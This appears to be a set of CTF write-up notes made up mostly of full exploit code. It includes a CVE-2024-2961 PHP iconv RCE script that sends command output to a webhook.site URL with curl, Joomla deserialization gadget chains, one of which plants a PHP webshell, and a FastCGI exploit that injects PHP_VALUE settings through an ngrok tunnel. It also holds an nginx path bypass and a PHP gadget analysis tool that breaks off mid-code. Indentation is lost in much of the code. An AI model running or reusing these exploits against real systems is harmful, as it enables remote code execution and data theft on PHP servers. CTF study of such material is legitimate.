CVE-2024-2961 iconv
| Event Name | 0xl4ugh |
| GitHub URL | - |
| Challenge Name | 0xNote |
Attachments
References
solve
Now that we can read arbitrary files, we can move to the next level: RCE. The key vulnerability here is CVE-2024-2961.
Vuln lab:
https://github.com/vulhub/vulhub/blob/master/php/CVE-2024-2961/README.md
POC:
https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py
Because I'm still a beginner when it comes to pwn, I'll only list what we need to read:
For full details, you can read here : https://blog.lexfo.fr/iconv-cve-2024-2961-p1.html
Full solve script
This is my solve script to bypass nginx -> read file -> set the charset to trigger RCE (Remember to change the webhook URL to your own)
import requests
from pwn import *
import re
import base64
import zlib
from bs4 import BeautifulSoup
session = requests.Session()
## Constant
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
## Post init function
def get_file(url, path):
path = f"php://filter/convert.base64-encode/resource={path}"
r = session.post(url + 'login.php', data={'username':'winky'})
r = session.post(url + 'index.php', data={'note':path})
r = session.post(url + '/premium.php/index.php', data={'color': 'SplFileObject'})
r = session.get(url + 'index.php')
soup = BeautifulSoup(r.text, "html.parser")
data = soup.find("div", id="noteContent").get_text(strip=True)
return base64.b64decode(data)
def compress(data):
    """Return *data* as a raw DEFLATE stream.

    The input is compressed at level 9, then the first two bytes and the
    last four bytes of the zlib output (its framing) are sliced off.
    """
    framed = zlib.compress(data, 9)
    header_len, trailer_len = 2, 4
    return framed[header_len:len(framed) - trailer_len]
def compressed_bucket(data):
return chunked_chunk(data, 0x8000)
def qpe(data):
    """Encode every byte of *data* as an upper-case ``=XX`` escape.

    Returns the escaped text as ``bytes``.
    """
    escaped = ["=%02X" % byte for byte in data]
    return "".join(escaped).encode()
def ptr_bucket(*ptrs, size=None):
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)
return bucket
def chunked_chunk(data, size: int = None):
    """Frame *data* as ``<hex length>\\n<data>\\n``.

    The hexadecimal length field is left-padded with ``0`` so that the whole
    frame is *size* bytes long. When *size* is omitted it defaults to
    ``len(data) + 8``.
    """
    if size is None:
        size = len(data) + 8
    # Two bytes of the frame are taken by the newlines around the payload.
    framing = len(b"\n\n")
    width = size - (len(data) + framing)
    length_field = format(len(data), "x").rjust(width, "0")
    return b"".join((length_field.encode(), b"\n", data, b"\n"))
## Pwn core
class PWN_Core():
def __init__(self, url, command) -> None:
self.url = url
self.command = command
self.info = {}
self.heap = None
self.pad = 20
class Region():
def __init__(self, start, stop, permissions, path):
self.start = int(start)
self.stop = int(stop)
self.permissions = permissions
self.path = path
@property
def size(self) -> int:
return self.stop - self.start
def download_file(self, remote_path: str, local_path: str) -> None:
    """Fetch *remote_path* through ``get_file`` and write it to *local_path*.

    Args:
        remote_path: Path of the file to read on the target.
        local_path: Local filesystem path the downloaded bytes are written to.
    """
    # ``Path`` is not imported explicitly at the top of this script; import it
    # here so the method does not depend on what a star import happens to
    # expose.
    from pathlib import Path

    data = get_file(self.url, remote_path)
    Path(local_path).write_bytes(data)
def get_regions(self):
    """Read ``/proc/self/maps`` via ``get_file`` and parse it.

    Returns a list of ``self.Region`` objects, one per line that matches the
    mapping pattern. For every line that does not match, the whole decoded
    maps text is printed.
    """
    raw_maps = get_file(self.url, "/proc/self/maps").decode()
    line_re = re.compile(
        r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
    )
    parsed = []
    for entry in raw_maps.strip().split('\n'):
        found = line_re.match(entry.strip())
        if not found:
            print(raw_maps)
            continue
        low, high, perms, tail = found.groups()
        # Keep only the last whitespace-separated token when the tail names
        # a file or a bracketed pseudo-region; otherwise treat it as unnamed.
        if "/" in tail or "[" in tail:
            name = tail.rsplit(" ", 1)[-1]
        else:
            name = ""
        parsed.append(self.Region(int(low, 16), int(high, 16), perms, name))
    return parsed
def _get_region(self, regions: list[Region], *names: str) -> Region:
for region in regions:
if any(name in region.path for name in names):
break
return region
def find_main_heap(self, regions):
    """Pick a heap address from the parsed memory regions.

    A region is a candidate when it is mapped ``rw-p``, is at least
    ``HEAP_SIZE`` bytes long, ends on a ``HEAP_SIZE``-aligned address and has
    an empty path or the path ``[anon:zend_alloc]``. For each candidate the
    value ``region.stop - HEAP_SIZE + 0x40`` is computed. Regions are scanned
    from the end of *regions*, and the first candidate found is returned.

    Raises:
        LookupError: If no region qualifies (previously a bare
            ``IndexError``).
    """
    heaps = [
        region.stop - HEAP_SIZE + 0x40
        for region in reversed(regions)
        if region.permissions == "rw-p"
        and region.size >= HEAP_SIZE
        and region.stop & (HEAP_SIZE - 1) == 0
        and region.path in ("", "[anon:zend_alloc]")
    ]
    if not heaps:
        raise LookupError("no candidate heap region found in the memory map")
    # Several candidates may exist; the first one found is used.
    return heaps[0]
def get_symbols_and_addresses(self) -> None:
regions = self.get_regions()
LIBC_FILE = "./libc"
self.info["heap"] = self.find_main_heap(regions)
libc = self._get_region(regions, "libc-", "libc.so")
self.download_file(libc.path, LIBC_FILE)
self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start
def build_exploit_path(self):
self.get_symbols_and_addresses()
LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)
step3_size = CS
step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = compress(compress(pages))
resource = base64.b64encode(resource).decode()
resource = f"data:text/plain;base64,{resource}"
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.L1.L1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.L1.L1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.L1.L1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.L1.L1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"
return path
def solve():
# URL = 'http://challenges2.ctf.sd:34896/'
URL = 'http://127.0.0.1:5000/'
path = PWN_Core(URL, 'curl https://webhook.site/ca9a194c-4098-4d72-85c1-1e96a6a62fa0/$(/readflag)').build_exploit_path()
try:
r = get_file(URL, path)
except:
pass
print('Exploit sucessfully')
solve()
PHP-FPM
Proxy / WAF Protections Bypass | hacktricks
Nginx FPM configuration:
Copy
location = /admin.php {
deny all;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
Nginx is configured to block access to /admin.php but it's possible to bypass this by accessing /admin.php/index.php.
How to prevent
Copy
location ~* ^/admin {
deny all;
}
Joomla PHP Gadget Chain
| Event Name | QiangWang CTF 2025 |
| GitHub URL | - |
| Challenge Name | - |
Attachments
References
solver 1
<?php
// https://xz.aliyun.com/t/17019?time__1311=mqGxnD9Dcim4lrzG7DyDIxhIDCUw3v33x
namespace Joomla\Database\Pdo {
class PdoDriver
{
protected $options;
public function __construct($options)
{
$this->options = $options;
}
}
}
namespace Symfony\Component\OptionsResolver {
class OptionsResolver
{
private bool $locked = true;
private array $defined = ['id'];
private array $lazy = array(
"orderBy" => array("array_walk_recursive")
);
private array $defaults = array(
"orderBy" => "system"
);
}
}
namespace Joomla\Database\Sqlite {
class SqliteDriver
{
protected $options;
public function __construct($options)
{
$this->options = $options;
}
}
class SqliteQuery
{
protected $type = 'select';
protected $selectRowNumber;
public function __construct()
{
$this->selectRowNumber = new \Symfony\Component\OptionsResolver\OptionsResolver();
}
}
}
namespace Joomla\CMS\Button {
class ActionButton
{
protected $states = [];
public function __construct()
{
}
}
}
namespace {
$toStringObj = new \Joomla\CMS\Button\ActionButton();
$toStringObj = new \Joomla\Database\Sqlite\SqliteQuery();
$options = array(
"driver" => $toStringObj
);
$pdoDriver = new \Joomla\Database\Pdo\PdoDriver($options);
$pdoDriver = new \Joomla\Database\Sqlite\SqliteDriver($options);
$ser = serialize($pdoDriver);
echo base64_encode($ser);
}
solver 2
Found an entirely different chain, which bypasses the patch applied to the previous one.
<?php
namespace Joomla\Filesystem {
class Stream
{
protected $a;
protected $b;
protected $fh = "fdsafa";
public function __construct($a, $b)
{
$this->a = $a;
$this->b = $b;
}
}
}
namespace Joomla\CMS\Log\Logger {
class FormattedtextLogger
{
public $defer;
protected $options = ['text_file_no_php' => true];
protected $path;
public $deferredEntries = [];
protected $format = '{F}';
protected $fields = ['F'];
public function __construct($path, $deferredEntries)
{
$this->path = $path;
$this->deferredEntries = $deferredEntries;
}
}
}
namespace Joomla\CMS\User {
class User
{
public $guest;
public function __construct($guest)
{
$this->guest = $guest;
}
}
}
namespace {
$path = "hui.php";
$data = "<?php system(\$_GET['cmd']); ?>";
$hui = new \stdClass();
$entry = new \Joomla\CMS\Log\LogEntry($data);
$entries = [$entry, $entry];
$defer = false;
$res = [
$defer,
];
$res[] =& $res[0];
$user = new \Joomla\CMS\User\User(
$defer
);
$logger = new \Joomla\CMS\Log\Logger\FormattedtextLogger(
$path,
$entries, // Reference to the array in LogEntry
);
$user->guest =& $res[0];
$logger->defer =& $res[0];
$res[] = $logger;
$res[] = $user;
return $res;
}
Exposed PHP FPM Exploit
solve
import random
import httpx
from pyngrok import ngrok
from flask import Flask
from multiprocessing import Process
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
# Referrer: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
RHOST = "http://54.251.191.248:31530/"
# RHOST = "http://localhost:31530/"
TUNNEL = ngrok.connect(4444, "http")
def bchr(i):
    """Return the single-byte ``bytes`` object whose value is *i*."""
    return bytes((i,))
def bord(c):
    """Return *c* unchanged if it is already an int, otherwise ``ord(c)``."""
    return c if isinstance(c, int) else ord(c)
def force_bytes(s):
    """Return *s* as ``bytes``, UTF-8 encoding it (strictly) when it is not already."""
    if not isinstance(s, bytes):
        return s.encode('utf-8', 'strict')
    return s
def force_text(s):
    """Return *s* as ``str``.

    Strings pass through untouched, ``bytes`` are decoded strictly as UTF-8,
    and anything else is converted with ``str()``.
    """
    if isinstance(s, str):
        return s
    return str(s, 'utf-8', 'strict') if isinstance(s, bytes) else str(s)
class FastCGIClient:
    """A Fast-CGI Client for Python.

    Builds the raw bytes of a FastCGI request (BEGIN, PARAMS and STDIN
    records) and can decode record headers read from a stream. It does not
    open any connection itself.
    """

    # private
    __FCGI_VERSION = 1

    __FCGI_ROLE_RESPONDER = 1
    __FCGI_ROLE_AUTHORIZER = 2
    __FCGI_ROLE_FILTER = 3

    __FCGI_TYPE_BEGIN = 1
    __FCGI_TYPE_ABORT = 2
    __FCGI_TYPE_END = 3
    __FCGI_TYPE_PARAMS = 4
    __FCGI_TYPE_STDIN = 5
    __FCGI_TYPE_STDOUT = 6
    __FCGI_TYPE_STDERR = 7
    __FCGI_TYPE_DATA = 8
    __FCGI_TYPE_GETVALUES = 9
    __FCGI_TYPE_GETVALUES_RESULT = 10
    __FCGI_TYPE_UNKOWNTYPE = 11

    __FCGI_HEADER_SIZE = 8

    # The record header stores the content length in two bytes.
    __FCGI_MAX_CONTENT = 0xFFFF

    # request state
    FCGI_STATE_SEND = 1
    FCGI_STATE_ERROR = 2
    FCGI_STATE_SUCCESS = 3

    def __init__(self):
        self.keepalive = 0
        self.requests = dict()

    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
        """Return one record: 8-byte header followed by *content*.

        Raises:
            ValueError: If *content* does not fit the 2-byte length field
                (it used to be emitted with a truncated length).
        """
        length = len(content)
        if length > FastCGIClient.__FCGI_MAX_CONTENT:
            raise ValueError(
                "FastCGI record content too long: %d bytes (max %d)"
                % (length, FastCGIClient.__FCGI_MAX_CONTENT)
            )
        buf = bchr(FastCGIClient.__FCGI_VERSION) \
            + bchr(fcgi_type) \
            + bchr((requestid >> 8) & 0xFF) \
            + bchr(requestid & 0xFF) \
            + bchr((length >> 8) & 0xFF) \
            + bchr(length & 0xFF) \
            + bchr(0) \
            + bchr(0) \
            + content
        return buf

    @staticmethod
    def __encodeLength(length):
        """Encode a name/value length: 1 byte below 128, else 4 bytes with the top bit set."""
        if length < 128:
            return bchr(length)
        return bchr((length >> 24) | 0x80) \
            + bchr((length >> 16) & 0xFF) \
            + bchr((length >> 8) & 0xFF) \
            + bchr(length & 0xFF)

    def __encodeNameValueParams(self, name, value):
        """Return one name/value pair: both lengths, then *name*, then *value* (bytes)."""
        record = FastCGIClient.__encodeLength(len(name)) \
            + FastCGIClient.__encodeLength(len(value))
        return record + name + value

    def __decodeFastCGIHeader(self, stream):
        """Decode the 8 header bytes in *stream* into a dict of named fields."""
        header = dict()
        header['version'] = bord(stream[0])
        header['type'] = bord(stream[1])
        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
        header['paddingLength'] = bord(stream[6])
        header['reserved'] = bord(stream[7])
        return header

    def __decodeFastCGIRecord(self, buffer):
        """Read one record from *buffer*.

        Returns the decoded header dict with an added ``'content'`` entry,
        or ``False`` when no header bytes could be read.
        """
        header = buffer.read(int(self.__FCGI_HEADER_SIZE))
        if not header:
            return False
        record = self.__decodeFastCGIHeader(header)
        record['content'] = b'' + buffer.read(int(record['contentLength']))
        # Padding bytes carry no data; read them only to advance the stream.
        buffer.read(int(record['paddingLength']))
        return record

    def request(self, nameValuePairs=None, post=''):
        """Build the raw bytes of one FastCGI request.

        Args:
            nameValuePairs: Mapping of parameter names to values (``str`` or
                ``bytes``); ``None`` or empty sends no parameters.
            post: Request body (``str`` or ``bytes``); empty sends no body.

        Returns:
            The concatenated BEGIN, PARAMS and STDIN records as ``bytes``.
            A random request id is chosen and registered in ``self.requests``.
        """
        requestId = random.randint(1, (1 << 16) - 1)
        self.requests[requestId] = dict()
        request = b""
        beginFCGIRecordContent = bchr(0) \
            + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
            + bchr(self.keepalive) \
            + bchr(0) * 5
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                              beginFCGIRecordContent, requestId)
        paramsRecord = b''
        if nameValuePairs:
            for (name, value) in nameValuePairs.items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)

        if paramsRecord:
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
        # An empty PARAMS record terminates the parameter stream.
        request += self.__encodeFastCGIRecord(
            FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)

        if post:
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
        # An empty STDIN record terminates the body stream.
        request += self.__encodeFastCGIRecord(
            FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
        return request

    def __repr__(self):
        # ``host``/``port`` are not set by ``__init__``; fall back to None so
        # repr() never raises on a freshly built client.
        return "fastcgi connect host:{} port:{}".format(
            getattr(self, 'host', None), getattr(self, 'port', None))
def build_request(cmd):
client = FastCGIClient()
params = dict()
documentRoot = "/"
uri = "/usr/local/lib/php/System.php"
content = f"<?=`{cmd}`?>"
params = {
'GATEWAY_INTERFACE': 'FastCGI/1.0',
'REQUEST_METHOD': 'POST',
'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
'SCRIPT_NAME': uri,
'QUERY_STRING': '',
'REQUEST_URI': uri,
'DOCUMENT_ROOT': documentRoot,
'SERVER_SOFTWARE': 'php/fcgiclient',
'REMOTE_ADDR': '127.0.0.1',
'REMOTE_PORT': '9985',
'SERVER_ADDR': '127.0.0.1',
'SERVER_PORT': '80',
'SERVER_NAME': "localhost",
'SERVER_PROTOCOL': 'HTTP/1.1',
'CONTENT_TYPE': 'application/text',
'CONTENT_LENGTH': "%d" % len(content),
'PHP_VALUE': 'auto_prepend_file = php://input',
'PHP_ADMIN_VALUE': 'allow_url_include = On'
}
return client.request(params, content)
def web(cmd):
app = Flask(__name__)
@app.get("/")
def data():
return build_request(cmd)
app.run("0.0.0.0", 4444)
class API:
def __init__(self) -> None:
self.c = httpx.Client(base_url=RHOST)
def curl(s, args):
return s.c.post("/", data={"urlInput": args})
if __name__ == '__main__':
cmd = "cat /flag*"
proc = Process(target=web, args=(cmd,))
proc.start()
url = TUNNEL.public_url
print(url)
api = API()
res = api.curl(f"{url} -o /tmp/data")
res = api.curl("telnet://localhost:9000 -T /tmp/data")
print(res.text)
proc.kill()
Gadget Taint Analysis in PHP and Symfony bundle part POP Chain
| Event Name | Infobahn CTF 2025 |
| GitHub URL | - |
| Challenge Name | Padoru Pwn Parade |
References
Unintended
using AST
#!/usr/bin/env python3
"""
Advanced PHP Gadget Chain Taint Analysis Tool
Uses php-ast Python module for accurate AST parsing
Supports multi-level taint tracking and object injection detection
Installation:
pip install php-ast
Usage:
python gadget_analyzer.py -d /path/to/php/project -r
"""
import os
import sys
import json
import argparse
import subprocess
import shutil
import tempfile
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Set, Optional, Any
from collections import defaultdict, deque
from enum import Enum
# Increase recursion limit as safety measure (though we use iterative traversal)
sys.setrecursionlimit(5000)
try:
from php_ast import php_ast
PHP_AST_AVAILABLE = True
except ImportError:
PHP_AST_AVAILABLE = False
print("Warning: php-ast module not found. Install with: pip install php-ast")
class TaintLevel(Enum):
"""Taint severity levels"""
SAFE = 0
LOW = 1
MEDIUM = 2
HIGH = 3
CRITICAL = 4
@dataclass
class TaintSource:
"""Represents a taint source"""
name: str
class_name: str
method_name: str
variable: str
location: str
source_type: str
confidence: float = 1.0
@dataclass
class TaintSink:
"""Represents a dangerous sink"""
name: str
class_name: str
method_name: str
filepath: str
location: str
function: str
severity: TaintLevel
line: int
parameters: List[str] = field(default_factory=list)
@dataclass
class CallSite:
"""Represents a function/method call"""
caller_class: str
caller_method: str
callee_class: Optional[str]
callee_method: str
call_type: str
line: int
variable: Optional[str] = None
@dataclass
class PropertyAccess:
"""Property access tracking"""
class_name: str
method_name: str
property_name: str
access_type: str
line: int
@dataclass
class GadgetChain:
"""Detected gadget chain"""
chain_id: int
entry_points: List[str]
chain_path: List[Dict[str, Any]]
sink: TaintSink
severity: TaintLevel
confidence: float
description: str
injectable_objects: List[Dict[str, Any]]
exploitation_notes: str
class PHPASTParser:
"""Parser that leverages php-ast module with a PHP CLI fallback"""
def __init__(self):
self.cli_parser = self._init_cli_parser()
self.parser = php_ast() if PHP_AST_AVAILABLE else None
if not self.parser and not self.cli_parser:
raise RuntimeError(
"php-ast module or PHP CLI ast extension is required. "
"Install python package with: pip install php-ast or enable the PHP ast extension."
)
def parse_file(self, filepath: str) -> Dict:
"""Parse PHP file and return AST"""
result = self._parse_with_module(filepath)
if result['success'] or not self.cli_parser:
return result
return self._parse_with_cli(filepath)
def parse_code(self, code: bytes) -> Dict:
"""Parse PHP code bytes and return AST"""
result = self._parse_code_with_module(code)
if result['success'] or not self.cli_parser:
return result
tmp_file = None
try:
with tempfile.NamedTemporaryFile('wb', suffix='.php', delete=False) as handle:
handle.write(code)
tmp_file = handle.name
cli_result = self._parse_with_cli(tmp_file)
return cli_result
finally:
if tmp_file and os.path.exists(tmp_file):
os.unlink(tmp_file)
def _parse_with_module(self, filepath: str) -> Dict[str, Any]:
if not self.parser:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': 'php-ast module unavailable'
}
try:
result = self.parser.get_file_ast(filepath)
if result.get('status') == 'successed':
return {
'filepath': filepath,
'ast': result.get('ast'),
'success': True
}
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': result.get('error') or result.get('reason') or 'Unknown error'
}
except Exception as exc:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': str(exc)
}
def _parse_code_with_module(self, code: bytes) -> Dict[str, Any]:
if not self.parser:
return {
'ast': None,
'success': False,
'error': 'php-ast module unavailable'
}
try:
result = self.parser.get_ast(code)
if result.get('status') == 'successed':
return {
'ast': result.get('ast'),
'success': True
}
return {
'ast': None,
'success': False,
'error': result.get('error') or result.get('reason') or 'Unknown error'
}
except Exception as exc:
return {
'ast': None,
'success': False,
'error': str(exc)
}
def _parse_with_cli(self, filepath: str) -> Dict[str, Any]:
if not self.cli_parser:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': 'PHP CLI parser unavailable'
}
cmd = [
self.cli_parser['binary'],
self.cli_parser['script'],
filepath,
str(self.cli_parser['version'])
]
try:
result = subprocess.run(
cmd,
capture_output=True,
text=True,
check=False
)
except Exception as exc:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': f"PHP CLI invocation failed: {exc}"
}
stdout = result.stdout.strip()
try:
parsed = json.loads(stdout) if stdout else {}
except json.JSONDecodeError:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': f"Invalid JSON from PHP CLI: {stdout[:120]}"
}
status = parsed.get('status')
success = status == 'successed'
error_msg = parsed.get('reason') or parsed.get('error') or (result.stderr.strip() if result.stderr else None)
return {
'filepath': filepath,
'ast': parsed.get('ast'),
'success': success,
'error': error_msg
}
def _init_cli_parser(self) -> Optional[Dict[str, Any]]:
php_binary = shutil.which('php')
script_path = Path(__file__).resolve().parent / 'scripts' / 'php_ast_cli.php'
if not php_binary or not script_path.exists():
return None
if not self._php_has_ast_extension(php_binary):
return None
supported_versions = self._get_supported_ast_versions(php_binary)
preferred_version = supported_versions[-1] if supported_versions else 90
return {
'binary': php_binary,
'script': str(script_path),
'version': preferred_version
}
def _php_has_ast_extension(self, php_binary: str) -> bool:
try:
result = subprocess.run(
[php_binary, '-r', 'echo extension_loaded("ast") ? "1" : "0";'],
capture_output=True,
text=True,
check=True
)
return result.stdout.strip() == '1'
except Exception:
return False
def _get_supported_ast_versions(self, php_binary: str) -> List[int]:
try:
result = subprocess.run(
[php_binary, '-r', 'echo json_encode(ast\\get_supported_versions());'],
capture_output=True,
text=True,
check=True
)
data = json.loads(result.stdout.strip() or '[]')
versions = []
for value in data or []:
try:
versions.append(int(value))
except (TypeError, ValueError):
continue
return sorted(set(versions))
except Exception:
return []
class ASTWalker:
"""Walks and analyzes PHP AST"""
def __init__(self):
self.classes: Dict[str, Dict] = {}
self.methods: Dict[str, Dict] = {}
self.calls: List[CallSite] = []
self.property_accesses: List[PropertyAccess] = []
self.current_class: Optional[str] = None
self.current_method: Optional[str] = None
self.current_file: str = ""
def walk(self, ast_data: Dict):
    """Analyze one parse result.

    Does nothing unless ``ast_data['success']`` is truthy. Otherwise records
    the result's ``filepath`` as the current file and, when an ``ast`` is
    present, traverses it.
    """
    if ast_data.get('success'):
        self.current_file = ast_data.get('filepath', '')
        tree = ast_data.get('ast')
        if tree:
            self._traverse_iterative(tree)
def _traverse_iterative(self, root: Dict):
"""Iteratively traverse AST nodes using a stack to avoid recursion depth issues"""
if not isinstance(root, dict):
return
# Stack contains tuples of (node, parent_context)
stack = [(root, None)]
while stack:
node, parent_context = stack.pop()
if not isinstance(node, dict):
continue
kind = node.get('kind')
line = node.get('lineno', 0)
# Process node based on kind
try:
if kind == 'AST_CLASS':
self._process_class(node)
elif kind == 'AST_METHOD':
self._process_method(node, parent_context)
elif kind == 'AST_CALL':
self._process_call(node, line)
elif kind == 'AST_METHOD_CALL':
self._process_method_call(node, line)
elif kind == 'AST_STATIC_CALL':
self._process_static_call(node, line)
elif kind == 'AST_NEW':
self._process_new(node, line)
elif kind == 'AST_PROP':
self._process_property_access(node, line)
except Exception as e:
# Continue processing even if one node fails
pass
# Add children to stack
new_context = {'parent_kind': kind, 'parent_line': line}
children = node.get('children')
if isinstance(children, dict):
for key, child in children.items():
if isinstance(child, dict):
stack.append((child, new_context))
elif isinstance(child, list):
for item in child:
if isinstance(item, dict):
stack.append((item, new_context))
elif isinstance(children, list):
for child in children:
if isinstance(child, dict):
stack.append((child, new_context))
def _process_class(self, node: Dict):
"""Process class declaration"""
children = node.get('children', {})
name_node = children.get('name')
extends_node = children.get('extends')
implements_node = children.get('implements')
class_name = self._get_name(name_node)
parent_name = self._get_name(extends_node) if extends_node else None
implements = self._extract_name_list(implements_node) if implements_node else []
if class_name:
old_class = self.current_class
self.current_class = class_name
self.classes[class_name] = {
'name': class_name,
'parent': parent_name,
'interfaces': implements,
'methods': {},
'properties': [],
'filepath': self.current_file,
'line': node.get('lineno', 0)
}
# Process class body using iterative approach
stmts = children.get('stmts')
if stmts:
self._process_stmts_iterative(stmts)
self.current_class = old_class
def _process_stmts_iterative(self, stmts_node: Dict):
"""Process statements iteratively"""
if not isinstance(stmts_node, dict):
return
stack = [stmts_node]
while stack:
node = stack.pop()
if not isinstance(node, dict):
continue
kind = node.get('kind')
line = node.get('lineno', 0)
# Process specific node types
try:
if kind == 'AST_METHOD':
self._process_method(node, None)
elif kind == 'AST_PROP_DECL':
self._process_property_decl(node)
except Exception:
pass
# Add children to stack
children = node.get('children')
if isinstance(children, dict):
for child in children.values():
if isinstance(child, (dict, list)):
stack.append(child)
elif isinstance(children, list):
for child in children:
if isinstance(child, dict):
stack.append(child)
def _process_property_decl(self, node: Dict):
"""Process property declaration"""
if not self.current_class:
return
children = node.get('children', {})
# Handle property declarations
if isinstance(children, list):
for prop in children:
if isinstance(prop, dict):
prop_children = prop.get('children', {})
name_node = prop_children.get('name')
prop_name = self._get_name(name_node)
if prop_name:
self.classes[self.current_class]['properties'].append(prop_name)
def _process_method(self, node: Dict, parent_context: Dict = None):
"""Process method declaration"""
children = node.get('children', {})
name_node = children.get('name')
method_name = self._get_name(name_node)
if method_name and self.current_class:
old_method = self.current_method
self.current_method = method_name
method_key = f"{self.current_class}::{method_name}"
method_data = {
'class': self.current_class,
'name': method_name,
'is_magic': method_name.startswith('__') and not method_name.endswith('construct'),
'line': node.get('lineno', 0),
'filepath': self.current_file,
'params': self._extract_params(children.get('params')),
'calls': [],
'property_accesses': [],
'variables': set()
}
self.methods[method_key] = method_data
if self.current_class in self.classes:
self.classes[self.current_class]['methods'][method_name] = method_data
# Process method body iteratively
stmts = children.get('stmts')
if stmts:
self._process_method_body_iterative(stmts, method_key)
self.current_method = old_method
def _process_method_body_iterative(self, stmts_node: Dict, method_key: str):
"""Process method body iteratively to avoid deep recursion"""
if not isinstance(stmts_node, dict):
return
stack = [stmts_node]
processed = set()
while stack:
node = stack.pop()
if not isinstance(node, dict):
continue
# Avoid processing the same node multiple times
node_id = id(node)
if node_id in processed:
continue
processed.add(node_id)
kind = node.get('kind')
line = node.get('lineno', 0)
# Process specific node types
try:
if kind == 'AST_CALL':
self._process_call(node, line)
elif kind == 'AST_METHOD_CALL':
